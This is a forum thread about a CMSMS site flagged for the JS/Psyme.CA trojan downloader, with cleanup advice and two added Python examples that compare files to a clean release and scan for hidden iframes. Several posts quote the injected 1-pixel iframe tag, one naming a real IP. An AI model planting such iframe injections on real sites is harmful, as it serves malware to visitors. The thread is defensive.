Hi,
I have a problem with a homepage I made.
I am using CMSMS 1.3.1 and the homepage is hosted on a server provided by a hosting company. The server is using Apache 2.x and the MySQL version is 5.x.
Everything worked fine, but now there is a security issue. If anybody visits this page, anti-virus software (in my case F-Secure) will discover a Trojan downloader in the homepage and display the warning message "Malicious code found in file C:\...\Temporary Internet Files\Content.IE5\QNC716NY\wp-stats[1].html. Infection: JS/Psyme.CA".
I upgraded CMSMS version 1.3.1 to 1.4.0, but it does not seem to help.
Any suggestions on how to get rid of the virus and what measures must be taken so it does not happen again?
I followed all the security instructions that were mentioned in the installation guide.
Thank you,
Kristian
PS I am not a professional IT specialist and my knowledge in this field is limited.
Infection: JS/Psyme.CA
Re: Infection: JS/Psyme.CA
You have been hacked. 1.3.1 is not supposed to be vulnerable, so you may have been hit from using an earlier ver. then upgraded w/o knowing you had a problem, or your host has a vulnerability. You need to back up files you added, like in uploads, modules, etc., and config.php, not admin or tmp etc....
Then wipe all folders/files from site then FTP fresh set of 1.4.0 folders/files and your backups, modules, etc. and config.php include the install folder then go to site.com/install/upgrade.php...
Or you could just look at the index.php to see if it looks diff. from the one in your folder of 1.4.0 on your comp...
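The comparison suggested above for index.php, extended to the whole site tree, as an added example that is not part of the original post or of CMSMS: it hashes every deployed file and reports those that differ from, or do not exist in, a clean unpacked release. The skip list and the file names in `demo()` are assumptions constructed for illustration.

```python
import hashlib
import os
import tempfile

# Assumption: paths that legitimately differ per site (user content, cache, local config).
SITE_SPECIFIC = ("uploads", "tmp", "config.php")


def hash_tree(root, skip=SITE_SPECIFIC):
    """Map relative path -> SHA-256 hex digest for every file under root."""
    digests = {}
    for dirpath, dirs, files in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root)
        # Prune skipped top-level directories in place so os.walk does not descend.
        if rel_dir == ".":
            dirs[:] = [d for d in dirs if d not in skip]
        for name in files:
            rel = os.path.normpath(os.path.join(rel_dir, name))
            if rel in skip:
                continue
            with open(os.path.join(dirpath, name), "rb") as fh:
                digests[rel] = hashlib.sha256(fh.read()).hexdigest()
    return digests


def compare_to_release(deployed, release):
    """Return (modified, extra): files changed from, or absent in, the clean release."""
    live, clean = hash_tree(deployed), hash_tree(release)
    modified = sorted(p for p in live if p in clean and live[p] != clean[p])
    extra = sorted(p for p in live if p not in clean)
    return modified, extra


def demo():
    """Constructed example: a clean tree and a copy with one altered and one added file."""
    with tempfile.TemporaryDirectory() as base:
        for tree, index_body in (("release", "<?php // core ?>"),
                                 ("site", "<?php // core ?><iframe>")):
            os.makedirs(os.path.join(base, tree, "lib"))
            for rel, body in (("index.php", index_body), ("lib/misc.php", "<?php ?>")):
                with open(os.path.join(base, tree, rel), "w") as fh:
                    fh.write(body)
        os.makedirs(os.path.join(base, "site", "uploads"))
        for rel in ("uploads/logo.png", "config.php", "lib/extra.php"):
            with open(os.path.join(base, "site", rel), "w") as fh:
                fh.write("site file")
        return compare_to_release(os.path.join(base, "site"), os.path.join(base, "release"))
```

Files listed as extra are not automatically malicious (installed modules also show up there), but each one needs an explanation before the site is considered clean.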
Re: Infection: JS/Psyme.CA
Thank you Mark,
Upgrade to 1.4.1 helped. Seems I did not do it correctly first time.
However, I still do not know where the vulnerability was/is, because the first CMSMS I have installed was 1.3.1 and I have not been using older versions of CMSMS than 1.3.1? I am trying to get some information from hosting company about possible security issue in their system.
Kristian
Re: Infection: JS/Psyme.CA
Are you still hacked, having problems?...
Re: Infection: JS/Psyme.CA
hi,
wp-stats.html?
that's a file belonging to wordpress not cmsms!
u r prolly vulnerable to the old iframe injection exploit in wp-stats plugin.
it has been solved in 2.2.3
just look through ur posts for something like
<__iframe src=http://xx.xxx.xx.xx/iframe/wp-stats.php width=1 height=1 frameborder=0></__iframe>
and delete it.
or do a google search, there r thousands of other ppl with the same problem.
greetz, rootkid
Re: Infection: JS/Psyme.CA
Hi,
Problem is back.
I found malicious code " <__iframe src=http://61.155.8.157..." in some php files, which were situated in catalogue .../htdocs/tmp/templates_c/
But, most likely this kind of code is also written to many different files somewhere in htdocs subdirectories.
As rootkid mentioned, this is a widely known problem with WordPress software, used for blogging. The funny thing is, that I am not a blogger and I do not use this software. Also I haven't installed any additional plugins to CMSMS.
From Google I found out, that CMS-s like Mambo and Joomla also have had this kind of problem.
I think I can get rid of the virus (delete old files and make new install, for example, if the infection is not in the MySQL database), but there is no point of doing it, if the question, "How the hackers get in?" remains unanswered.
Kristian
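One way to locate every file carrying the kind of injected tag quoted in this thread, as an added example that is not part of the original posts: it walks a web root and reports iframes that are 0 or 1 pixel in size or styled invisible. The extension list and the constructed tree in `demo()` are assumptions for illustration; the sample tag is the masked one quoted earlier in the thread.

```python
import os
import re
import tempfile

# Matches <iframe ...> and the forum-mangled <__iframe ...> form quoted in this thread.
IFRAME_RE = re.compile(r"<_*iframe\b([^>]*)>", re.IGNORECASE)
ATTR_RE = re.compile(r"""([a-z]+)\s*=\s*["']?([^\s"'>]+)""", re.IGNORECASE)
SCAN_EXT = (".php", ".html", ".htm", ".tpl", ".js", ".inc")  # assumption: adjust per site


def find_hidden_iframes(text):
    """Return src values of iframes that are 0-1 px in size or styled invisible."""
    hits = []
    for m in IFRAME_RE.finditer(text):
        attrs = {k.lower(): v for k, v in ATTR_RE.findall(m.group(1))}
        tiny = any(attrs.get(d, "").rstrip("px") in ("0", "1") for d in ("width", "height"))
        hidden = re.search(r"display\s*:\s*none|visibility\s*:\s*hidden", m.group(1), re.I)
        if tiny or hidden:
            hits.append(attrs.get("src", "(no src)"))
    return hits


def scan_tree(root):
    """Walk a web root and map relative file path -> list of suspicious iframe sources."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(SCAN_EXT):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = find_hidden_iframes(fh.read())
            if hits:
                findings[os.path.relpath(path, root)] = hits
    return findings


def demo():
    """Build a constructed htdocs tree with one injected file and scan it."""
    with tempfile.TemporaryDirectory() as root:
        cache = os.path.join(root, "tmp", "templates_c")
        os.makedirs(cache)
        with open(os.path.join(cache, "page.php"), "w") as fh:
            fh.write("<?php echo 'x'; ?>\n<__iframe src=http://xx.xxx.xx.xx/iframe/wp-stats.php "
                     "width=1 height=1 frameborder=0></__iframe>\n")
        with open(os.path.join(root, "index.php"), "w") as fh:
            fh.write('<iframe src="/map.html" width="600" height="400"></iframe>\n')
        return scan_tree(root)
```

A clean scan only shows that this one pattern is absent from files; it does not cover content stored in the database or other forms of injected script.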
Re: Infection: JS/Psyme.CA
Torgu wrote: but there is no point of doing it, if the question, "How the hackers get in?" remains unanswered.
If you stay on shared server, you can be hacked from an other site on same server .....
Alby